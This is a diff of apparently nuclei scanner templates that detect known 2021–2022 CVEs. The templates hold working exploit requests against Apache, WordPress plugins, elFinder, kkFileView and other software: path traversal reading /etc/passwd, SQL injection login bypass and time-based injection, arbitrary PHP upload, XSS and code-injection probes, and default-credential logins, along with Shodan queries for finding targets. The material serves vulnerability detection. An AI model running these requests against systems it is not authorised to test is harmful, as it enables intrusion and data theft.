author: gy741,dhiyaneshDk
|
||||
severity: medium
|
||||
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-33851
|
||||
|
||||
info:
|
||||
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
|
||||
name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
|
||||
author: 8authur
|
||||
severity: medium
|
||||
description: |
|
||||
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
|
||||
WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
|
||||
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
|
||||
|
@ -62,3 +62,5 @@ requests:
|
|||
regex:
|
||||
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
|
||||
internal: true
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-35380
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
|
||||
tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -16,8 +16,10 @@ info:
|
|||
cve-id: CVE-2021-35587
|
||||
cwe-id: CWE-502
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: body="/oam/pages/css/login_page.css"
|
||||
tags: cve,cve2021,oam,rce,java,unauth,oracle
|
||||
shodan-query: http.title:"Oracle Access Management"
|
||||
tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-37704
|
||||
|
||||
info:
|
||||
name: phpinfo Resource Exposure
|
||||
name: phpfastcache - phpinfo Resource Exposure
|
||||
author: whoever
|
||||
severity: medium
|
||||
description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.
|
||||
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 4.3
|
||||
cve-id: CVE-2021-37704
|
||||
cwe-id: CWE-668
|
||||
tags: cve,cve2021,exposure,phpfastcache,phpinfo
|
||||
tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -23,6 +23,7 @@ requests:
|
|||
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php"
|
||||
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-38751
|
||||
|
||||
info:
|
||||
name: ExponentCMS <= 2.6 Host Header Injection
|
||||
name: ExponentCMS <= 2.6 - Host Header Injection
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-40438
|
||||
|
||||
info:
|
||||
name: Apache <= 2.4.48 Mod_Proxy SSRF
|
||||
name: Apache <= 2.4.48 - Mod_Proxy SSRF
|
||||
author: pdteam
|
||||
severity: critical
|
||||
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2021-40661
|
||||
|
||||
info:
|
||||
name: IND780 - Directory Traversal
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
description: |
|
||||
A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
|
||||
reference:
|
||||
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
|
||||
- https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-40661
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
google-query: inurl:excalweb.dll
|
||||
shodan-query: IND780
|
||||
verified: "true"
|
||||
tags: cve,cve2021,ind780,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'ExePath=\Windows'
|
||||
- 'WorkDir=\Windows'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-41174
|
||||
|
||||
info:
|
||||
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
|
||||
name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
|
||||
author: daffainfo,666asd
|
||||
severity: high
|
||||
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
description: |
|
||||
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
reference:
|
||||
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|
||||
|
@ -12,15 +13,14 @@ info:
|
|||
- https://twitter.com/ptswarm/status/1445376079548624899
|
||||
- https://twitter.com/h4x0r_dz/status/1445401960371429381
|
||||
- https://github.com/blasty/CVE-2021-41773
|
||||
remediation: Update to Apache HTTP Server 2.4.50 or later.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-41773
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
shodan-query: apache version:2.4.49
|
||||
verified: "true"
|
||||
shodan-query: Apache 2.4.49
|
||||
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
|
||||
|
||||
variables:
|
||||
|
@ -32,6 +32,10 @@ requests:
|
|||
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -42,7 +46,6 @@ requests:
|
|||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
name: LFI
|
||||
regex:
|
||||
|
|
|
@ -0,0 +1,52 @@
|
|||
id: CVE-2021-43421
|
||||
|
||||
info:
|
||||
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
|
||||
author: akincibor
|
||||
severity: critical
|
||||
description: |
|
||||
A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
|
||||
reference:
|
||||
- https://github.com/Studio-42/elFinder/issues/3429
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
|
||||
- https://twitter.com/infosec_90/status/1455180286354919425
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-43421
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,elfinder,upload,rce,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
|
||||
- |
|
||||
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_3, "{{randstr_1}}")'
|
||||
- "status_code == 200"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: hash
|
||||
group: 1
|
||||
regex:
|
||||
- '"hash"\:"(.*?)"\,'
|
||||
internal: true
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-43510
|
||||
|
||||
info:
|
||||
name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
|
||||
- https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43510
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-43510
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=admin'+or+'1'%3d'1'--+-&password=as
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(all_headers_1, "text/html")'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(body_1, "{\"status\":\"success\"}")'
|
||||
- 'contains(body_2, "Welcome to Simple Client")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -17,18 +17,22 @@ info:
|
|||
metadata:
|
||||
shodan-query: http.html:"kkFileView"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,kkfileview,traversal
|
||||
tags: cve,cve2021,kkfileview,traversal,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
|
||||
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0:"
|
||||
- "for 16-bit app support"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-43778
|
||||
|
||||
info:
|
||||
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
|
||||
name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
|
||||
|
|
|
@ -1,20 +1,25 @@
|
|||
id: unauth-rlm
|
||||
id: CVE-2021-44152
|
||||
|
||||
info:
|
||||
name: Reprise License Manager 14.2 - Authentication Bypass
|
||||
author: Akincibor
|
||||
severity: critical
|
||||
description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
|
||||
description: |
|
||||
Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
|
||||
- https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes
|
||||
- http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-44152
|
||||
cwe-id: CWE-287
|
||||
tags: unauth,rlm,packetstorm
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"Reprise License Manager"
|
||||
google-dork: inurl:"/goforms/menu"
|
||||
tags: cve2021,rlm,auth-bypass,packetstorm,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -23,13 +28,13 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "RLM Administration Commands"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/03
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-44451
|
||||
|
||||
info:
|
||||
name: Apache Superset Default Login
|
||||
name: Apache Superset - Default Login
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
|
||||
description: |
|
||||
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
|
||||
reference:
|
||||
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
|
||||
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
|
||||
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 6.5
|
||||
|
@ -25,17 +25,18 @@ requests:
|
|||
- |
|
||||
GET /login/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
|
||||
- |
|
||||
POST /login/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}/admin/airflow/login
|
||||
|
||||
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
GET /dashboard/list/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
|
@ -43,32 +44,25 @@ requests:
|
|||
password:
|
||||
- admin
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header_2
|
||||
words:
|
||||
- 'session'
|
||||
|
||||
- type: word
|
||||
part: body_3
|
||||
words:
|
||||
- 'DashboardFilterStateRestApi'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf_token
|
||||
group: 1
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- 'value="(.*?)">'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: and
|
||||
words:
|
||||
- '<title>Redirecting...</title>'
|
||||
- '<h1>Redirecting...</h1'
|
||||
- '<a href="/">'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'session'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
# Enhanced by mp on 2022/03/02
|
||||
- 'name="csrf_token" type="hidden" value="(.*)"'
|
||||
internal: true
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-45232
|
||||
|
||||
info:
|
||||
name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
|
||||
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
|
||||
author: Mr-xn
|
||||
severity: critical
|
||||
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0147
|
||||
|
||||
info:
|
||||
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
|
||||
name: WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting
|
||||
author: 8arthur
|
||||
severity: medium
|
||||
description: |
|
||||
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
|
||||
WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
|
||||
- https://wordpress.org/plugins/wp-gdpr-compliance/
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0346
|
||||
|
||||
info:
|
||||
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting
|
||||
author: Akincibor
|
||||
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
|
||||
author: Akincibor,theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
|
||||
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
|
||||
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
|
||||
|
@ -17,34 +17,27 @@ info:
|
|||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
|
||||
tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
|
||||
stop-at-first-match: true
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
|
||||
- "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, ' type specified')"
|
||||
condition: or
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- "<img src onerror=alert(document.domain)>"
|
||||
- "Invalid Provider type specified"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
part: body_2
|
||||
words:
|
||||
- text/html
|
||||
- "2ef3baa95802a4b646f2fc29075efe34"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '>PHP Version <\/td><td class="v">([0-9.]+)'
|
||||
|
||||
# Enhanced by md on 2022/09/08
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-0349
|
||||
|
||||
info:
|
||||
name: WordPress NotificationX <2.3.9 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
|
||||
- https://wordpress.org/plugins/notificationx/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0349
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0349
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
nx_id=sleep(6) -- x
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "\"data\":{\"success\":true}")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0434
|
||||
|
||||
info:
|
||||
name: Page Views Count < 2.4.15 - Unauthenticated SQL Injection
|
||||
name: WordPress Page Views Count <2.4.15 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Unauthenticated SQL Injection in WordPress Page Views Count Plugin (versions < 2.4.15).
|
||||
WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
|
||||
- https://wordpress.org/plugins/page-views-count/
|
||||
|
@ -38,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,100 @@
|
|||
id: CVE-2022-0735
|
||||
|
||||
info:
|
||||
name: GitLab CE/EE - Runner Registration Token Disclosure
|
||||
author: GitLab Red Team
|
||||
severity: critical
|
||||
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands.
|
||||
reference:
|
||||
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
|
||||
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0735
|
||||
cwe-id: CWE-863
|
||||
metadata:
|
||||
shodan-query: http.title:"GitLab"
|
||||
tags: cve,cve2022,gitlab
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/users/sign_in"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
|
||||
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
|
||||
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
|
||||
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
|
||||
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
|
||||
- "1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8"
|
||||
- "1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7"
|
||||
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
|
||||
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
|
||||
- "2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f"
|
||||
- "2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be"
|
||||
- "301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0"
|
||||
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
|
||||
- "383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7"
|
||||
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
|
||||
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
|
||||
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
|
||||
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
|
||||
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
|
||||
- "4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7"
|
||||
- "50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9"
|
||||
- "515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe"
|
||||
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
|
||||
